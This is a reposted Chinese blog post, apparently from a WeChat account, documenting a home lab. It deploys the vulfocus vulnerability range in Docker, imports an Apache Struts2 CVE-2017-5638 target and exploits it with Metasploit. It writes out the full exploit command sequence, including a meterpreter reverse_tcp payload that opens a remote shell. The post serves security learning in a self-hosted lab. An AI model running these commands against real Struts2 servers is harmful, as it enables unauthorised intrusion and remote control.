本周末实践的是开源漏洞靶场vulfocus,真是简单易用,以下是实践记录,
搞个ubuntu18.04的虚拟机,安装docker,
sudo apt install docker.io,
sudo systemctl enable docker,
sudo gpasswd -a ubuntu docker,
newgrp docker,
下载vulfocus容器镜像,docker pull vulfocus/vulfocus:latest,
启动vulfocus容器实例,
docker run -d -p 8001:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=10.90.11.162 vulfocus/vulfocus,
这就可以访问vulfocus的管理界面了,http://10.90.11.162:8001,
admin/admin,登录进去,首先看镜像管理,开始是空的,点击一键同步,就都出来了,
我习惯用cve-2017-5638做实验,搜一下看有没有,
搜出来的可以点击下载,就自动导入了,也可以手动导入本地的镜像,因为我拿vulfocus自带的cve-2017-5638镜像做攻击验证没成功,就又自己手动导入的piesecurity/apache-struts2-cve-2017-5638,
导入镜像成功后,主页上就能看到并可以启动了,
本地安装个metasploit,进行攻击实验,
msfconsole,
use exploit/multi/http/struts2_content_type_ognl,
set RHOST 10.90.11.162,
set RPORT 34351,
set TARGETURI showcase.jsp,
set LHOST 10.90.11.162,
set payload linux/x64/meterpreter/reverse_tcp,
exploit,
这里需要特别注意的是,需要自己手动docker ps看一下靶机的映射端口,
并通过set RPORT进行配置,攻击成功了就是下面这样,
原文始发于微信公众号(云计算和网络安全技术实践):开源漏洞靶场vulfocus的实践(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论